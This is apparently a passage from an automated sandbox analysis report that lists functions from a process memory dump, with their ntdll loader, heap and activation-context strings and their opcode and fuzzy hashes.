                                                                      • Opcode ID: 6ec4a74f52357eeb0c8be48318d3eb82476db8144c5e050e8da2fc978b5c2a7b
                                                                      • Instruction ID: 10ab57e1aea536900c653e674c520c2950141c1ea5833ff4422e9d050f37e758
                                                                      • Opcode Fuzzy Hash: 6ec4a74f52357eeb0c8be48318d3eb82476db8144c5e050e8da2fc978b5c2a7b
                                                                      • Instruction Fuzzy Hash: 0E51C271A043059BD329CF188848BABBBECFF94740F54491DEA9DC3240E770D648CB92
                                                                      Function 01980274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      • API String ID: 0-1700792311
                                                                      • Opcode ID: d688fb3a3820fc09630a3df159eb99ab91ecf5ef3e51976d270534ee7c192251
                                                                      • Instruction ID: 6669119829e81118e603e671f3012d3c9c8754b878fc90cbf47c1e2d78324d15
                                                                      • Opcode Fuzzy Hash: d688fb3a3820fc09630a3df159eb99ab91ecf5ef3e51976d270534ee7c192251
                                                                      • Instruction Fuzzy Hash: 38D1DD31604686DFDB22EF6CC451AADBBF5FF49B14F088059F4899B252D734DA89CB20
                                                                      Function 019589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01958A3D
                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01958A67
                                                                      • HandleTraces, xrefs: 01958C8F
                                                                      • VerifierDlls, xrefs: 01958CBD
                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01958B8F
                                                                      • VerifierFlags, xrefs: 01958C50
                                                                      • VerifierDebug, xrefs: 01958CA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                      • API String ID: 0-3223716464
                                                                      • Opcode ID: 4cd323e700e40449022e67634af4a66291ce4cb3d50bbe3c192096b1a91c44b3
                                                                      • Instruction ID: 46cb7f61ce1be3da5bb63ab37df974314b9f335b99097a983f807030781e1511
                                                                      • Opcode Fuzzy Hash: 4cd323e700e40449022e67634af4a66291ce4cb3d50bbe3c192096b1a91c44b3
                                                                      • Instruction Fuzzy Hash: 5F910171A05716EFE761DF2EC880B5AB7E9AB94B14F05081CFE89BB241D730AD00C792
                                                                      Function 018DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                      • API String ID: 0-1109411897
                                                                      • Opcode ID: c6106e9dd9a8e4988dfb7d90f690282ef9941869bdcbc285b34d799d290461fc
                                                                      • Instruction ID: 55f21dccf8a3c603735c68a64b880a991efd394e0bb5eb3c4c88ede24d9868b8
                                                                      • Opcode Fuzzy Hash: c6106e9dd9a8e4988dfb7d90f690282ef9941869bdcbc285b34d799d290461fc
                                                                      • Instruction Fuzzy Hash: AAA24974A0562A8FDF65DF28CD887A9BBB5AF85704F1542E9D90EE7250DB309E81CF00
                                                                      Function 019063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-792281065
                                                                      • Opcode ID: a3883033a65c8496da8d822188333b0f644d9a9a779b466736e6ac9b6944fe1a
                                                                      • Instruction ID: 506fcdeb24e4a2a60a3846446e7a8c30a4322ef3d70a7893c4539bbcff5780bd
                                                                      • Opcode Fuzzy Hash: a3883033a65c8496da8d822188333b0f644d9a9a779b466736e6ac9b6944fe1a
                                                                      • Instruction Fuzzy Hash: 53915570B043159FEB36DF28D884FAA7BA6BF90B25F150128E94CAB3C5D774A901C791
                                                                      Function 018C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrpInitShimEngine, xrefs: 019299F4, 01929A07, 01929A30
                                                                      • Getting the shim user exports failed with status 0x%08lx, xrefs: 01929A01
                                                                      • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 019299ED
                                                                      • apphelp.dll, xrefs: 018C6496
                                                                      • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01929A2A
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01929A11, 01929A3A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-204845295
                                                                      • Opcode ID: 76f75410a9ddbb178c7122163e9bc4431633f7f3dceaa4aa308843a3903ed771
                                                                      • Instruction ID: 09c84d02b4701fda99a889c26032cae45cac74f4798316fca8f02c72bf6ed0c0
                                                                      • Opcode Fuzzy Hash: 76f75410a9ddbb178c7122163e9bc4431633f7f3dceaa4aa308843a3903ed771
                                                                      • Instruction Fuzzy Hash: 6851C0712083149FE720DF28D885FAB77E9FB84B58F14492DF589D7264E630EA04CB92
                                                                      Function 0190C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01948170
                                                                      • LdrpInitializeImportRedirection, xrefs: 01948177, 019481EB
                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 019481E5
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01948181, 019481F5
                                                                      • LdrpInitializeProcess, xrefs: 0190C6C4
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0190C6C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-475462383
                                                                      • Opcode ID: 79fc8835347ec8c8aa000cfbc3effef1d383c701315cd8c55949570222895709
                                                                      • Instruction ID: 5af940722dab67b862e259d26c3bcf2e7618064ad0a9e101b9f8eeba10c680c5
                                                                      • Opcode Fuzzy Hash: 79fc8835347ec8c8aa000cfbc3effef1d383c701315cd8c55949570222895709
                                                                      • Instruction Fuzzy Hash: 49311371B443069FD220EF68DD86E1AB795FFD4B10F01055CF989AB391E620EE04C7A2
                                                                      Function 01902674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01942178
                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01942160, 0194219A, 019421BA
                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0194219F
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01942180
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019421BF
                                                                      • SXS: %s() passed the empty activation context, xrefs: 01942165
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                      • API String ID: 0-861424205
                                                                      • Opcode ID: 0684790476bedb1217699c9e59edfd79b48b67e6e0652b4d5774877148545e20
                                                                      • Instruction ID: ab24dda8a280a8a221bf354163e5fd608d4a81f23d919dbc61f9e01f43ece02b
                                                                      • Opcode Fuzzy Hash: 0684790476bedb1217699c9e59edfd79b48b67e6e0652b4d5774877148545e20
                                                                      • Instruction Fuzzy Hash: FF31E836A402156BE7228B999CC5F9A7B68FB95B90F050059BA0DB7380D670AB01C7A1
                                                                      Function 0191096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 01912DF0: LdrInitializeThunk.NTDLL ref: 01912DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01910D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 1404860816-0
                                                                      • Opcode ID: 9c08e2a141a505f5b2ef505778b690f927c0fd3b1aafbe541ce0b59260d15416
                                                                      • Instruction ID: 331df702a2fecc2ed786b90780a7aff8bc224664c373ffb72da0f4a6861c87ce
                                                                      • Opcode Fuzzy Hash: 9c08e2a141a505f5b2ef505778b690f927c0fd3b1aafbe541ce0b59260d15416
                                                                      • Instruction Fuzzy Hash: DC426C75900719DFDB21CF28C880BAAB7F9BF48304F1485A9E98DDB245D771AA84CF61
                                                                      Function 018DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                      • API String ID: 0-379654539
                                                                      • Opcode ID: 938d31755103b42a5b4cb4fe12af14c71a55b55426c1fa93d3fd78bdb4be49f2
                                                                      • Instruction ID: 85c7c0755682e7ba2a6840d6d1d27ddea4eea327ba3298a381cc4015bbd6889f
                                                                      • Opcode Fuzzy Hash: 938d31755103b42a5b4cb4fe12af14c71a55b55426c1fa93d3fd78bdb4be49f2
                                                                      • Instruction Fuzzy Hash: 7BC18A74508386CFD719DF68C084B6ABBF4BF84708F14896AF999CB251E734CA49CB52
                                                                      Function 01908402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • @, xrefs: 01908591
                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0190855E
                                                                      • LdrpInitializeProcess, xrefs: 01908422
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01908421
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-1918872054
                                                                      • Opcode ID: 6172c5003cf6628ae061204482f88ac1606a088e6fbfd6ef89d80f9feded9f97
                                                                      • Instruction ID: 449ca31873ba0cb4369cd702220bf86a24f4fc5fb866b5ebf3b005c378cc4468
                                                                      • Opcode Fuzzy Hash: 6172c5003cf6628ae061204482f88ac1606a088e6fbfd6ef89d80f9feded9f97
                                                                      • Instruction Fuzzy Hash: AE918071A48345AFE722EF65CC41E6BBAECBF84744F40092EFA88D2151E735DA44CB52
                                                                      Function 0190273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019421D9, 019422B1
                                                                      • .Local, xrefs: 019028D8
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019422B6
                                                                      • SXS: %s() passed the empty activation context, xrefs: 019421DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                      • API String ID: 0-1239276146
                                                                      • Opcode ID: 0b2f2785cb9662f49913d3a59c12c6d0d1cdceb2c8aac3c2ab9a1711d1db90c5
                                                                      • Instruction ID: 4c9d44f1cd9a8d7761dc0150745e7d6cb71d6334aba90bd9747056a3dbcf08de
                                                                      • Opcode Fuzzy Hash: 0b2f2785cb9662f49913d3a59c12c6d0d1cdceb2c8aac3c2ab9a1711d1db90c5
                                                                      • Instruction Fuzzy Hash: 6CA1C235900229DFDB26CF58D988BA9B3B9BF58354F1401E9E91CAB391D7309E80CF90
                                                                      Function 01904AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RtlDeactivateActivationContext, xrefs: 01943425, 01943432, 01943451
                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01943437
                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01943456
                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0194342A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                      • API String ID: 0-1245972979
                                                                      • Opcode ID: a539b03c2f61069b1a9007c1b6288fd1c131a888a9670be614aacdc9f2312afa
                                                                      • Instruction ID: ad93fe9d29f6d7a6e2cee5e8dc18fc59526a9b93170da095bee1e9701a6559e0
                                                                      • Opcode Fuzzy Hash: a539b03c2f61069b1a9007c1b6288fd1c131a888a9670be614aacdc9f2312afa
                                                                      • Instruction Fuzzy Hash: C661F7766007229FD723CF2DC881F6AB7E9AF80B51F148519E9599B280D734E941CB91
                                                                      Function 018D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01931028
                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019310AE
                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01930FE5
                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0193106B
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                      • API String ID: 0-1468400865
                                                                      • Opcode ID: 313666469f5bae192e764d194233f31aab69291b645d6b1029c2fb4bc9b11d10
                                                                      • Instruction ID: 764a8b683b11c7e667911d0a4abe9f39b665d35a0de2cd1bff989cea0d6f60e1
                                                                      • Opcode Fuzzy Hash: 313666469f5bae192e764d194233f31aab69291b645d6b1029c2fb4bc9b11d10
                                                                      • Instruction Fuzzy Hash: 4D71C2B19043499FCB21DF18C884B977FA8EF94764F540468F9498B24AE734D6C8CBD2
                                                                      Function 018F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrpDynamicShimModule, xrefs: 0193A998
                                                                      • apphelp.dll, xrefs: 018F2462
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0193A992
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0193A9A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-176724104
                                                                      • Opcode ID: 23df54792c9685ececb33f7631035fd43aca9713ac0d53d25b254895be2dcd24
                                                                      • Instruction ID: 2f2266cb844ff03ad16342a30e73349e934e318188e7e057c287edaee7f14ed7
                                                                      • Opcode Fuzzy Hash: 23df54792c9685ececb33f7631035fd43aca9713ac0d53d25b254895be2dcd24
                                                                      • Instruction Fuzzy Hash: 5A316672600201EFDB319F5D9885EAA7BBAFBC0B04F66405DE984E7355C7B09A42C781
                                                                      Function 018E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018E327D
                                                                      • HEAP[%wZ]: , xrefs: 018E3255
                                                                      • HEAP: , xrefs: 018E3264
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                      • API String ID: 0-617086771
                                                                      • Opcode ID: 02e9e6cfe883b2a287d56d272c5eaf59d7ba3091d59ab074024984809199ff56
                                                                      • Instruction ID: a7808d28b782cc4764b1f7c694e46bdaa267379baa1d642217a7e8d856911fc3
                                                                      • Opcode Fuzzy Hash: 02e9e6cfe883b2a287d56d272c5eaf59d7ba3091d59ab074024984809199ff56
                                                                      • Instruction Fuzzy Hash: EE92BC71A042499FDB25CF68C448BADBBF6FF4A304F188059E859EB392D735AA41CF50
                                                                      Function 018E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-4253913091
                                                                      • Opcode ID: 47cc39f7b60ee87287c6ce9781f78ae0ec52220c7b4ae5be0a569103d41fd919
                                                                      • Instruction ID: 88f63499e0aceb3b60ffafa3b2b48d132ef9175445e49854c5d5e170f6946f4b
                                                                      • Opcode Fuzzy Hash: 47cc39f7b60ee87287c6ce9781f78ae0ec52220c7b4ae5be0a569103d41fd919
                                                                      • Instruction Fuzzy Hash: ADF1AC3070060ADFEB25DF68C898B6AB7F5FB85304F148568E45ADB381D774EA81CB91
                                                                      Function 018F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $@
                                                                      • API String ID: 0-1077428164
                                                                      • Opcode ID: 47fc4fe993bcede1eee5fb7a17d9a373dc13c0389bf32e028d815f0ac86e38be
                                                                      • Instruction ID: 8c59508e7d14f605afad64c3c58bee204dab8a1399daf838006bd95b958f2531
                                                                      • Opcode Fuzzy Hash: 47fc4fe993bcede1eee5fb7a17d9a373dc13c0389bf32e028d815f0ac86e38be
                                                                      • Instruction Fuzzy Hash: B3C29F716087459FE725CF28C880BABBBE5AFC8714F04892EFA89D7241E734D945CB52
                                                                      Function 018CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                      • API String ID: 0-2779062949
                                                                      • Opcode ID: 0d88f8337a56ff8b1ae128cd1f86b79172be7701d7811f9d36b2a548fb4211d7
                                                                      • Instruction ID: fc529d7a1b31e29ad7d1fc5dcbe5f1bf0d94b0f6cd8531dd2dffca93d964bb0c
                                                                      • Opcode Fuzzy Hash: 0d88f8337a56ff8b1ae128cd1f86b79172be7701d7811f9d36b2a548fb4211d7
                                                                      • Instruction Fuzzy Hash: C2A12B719116299BDB21DB68CC88BAEB7B8EB44B10F1001E9EA0DE7254E7359F84CF50
                                                                      Function 018F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0193A10F
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0193A121
                                                                      • LdrpCheckModule, xrefs: 0193A117
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-161242083
                                                                      • Opcode ID: 9f38d11bf8c99a4e3c6e2e2b8b9edebef6a982565448de7be9901c0150be8784
                                                                      • Instruction ID: f377c38f0c88e7c2bdedd726544a42cf9e0168c178c5e437435a1b25c308c3ec
                                                                      • Opcode Fuzzy Hash: 9f38d11bf8c99a4e3c6e2e2b8b9edebef6a982565448de7be9901c0150be8784
                                                                      • Instruction Fuzzy Hash: 2A71BD71A002059FDB25DFACC984BAEB7F5FB84704F14402DEA86E7356E734AA41CB52
                                                                      Function 018E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-1334570610
                                                                      • Opcode ID: 5a476424c947fee2d394c565608a674df42db1b1623cc873dc8b7331b62663ce
                                                                      • Instruction ID: 01406eabd1e750051221c7de3ec08fcaa754d5ccfdecda49756a2875c736aa6b
                                                                      • Opcode Fuzzy Hash: 5a476424c947fee2d394c565608a674df42db1b1623cc873dc8b7331b62663ce
                                                                      • Instruction Fuzzy Hash: C461C070704305DFEB29CF28C484B6ABBE5FF86704F158959E499CB292D7B0E981CB91
                                                                      Function 0190C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 019482DE
                                                                      • Failed to reallocate the system dirs string !, xrefs: 019482D7
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 019482E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-1783798831
                                                                      • Opcode ID: ffbb0e92d1f9627c3d94d0b7e396a5e862f2b5e0701e30b529c55ae4aae12b9b
                                                                      • Instruction ID: b50be61b0c8113793f259369c4662761b14b79a239826d61b41772bab9d25517
                                                                      • Opcode Fuzzy Hash: ffbb0e92d1f9627c3d94d0b7e396a5e862f2b5e0701e30b529c55ae4aae12b9b
                                                                      • Instruction Fuzzy Hash: 6541E171548301AFD722EB68D944F5B77ECAF44B54F004A2AFA89D3294EB74E900CB92
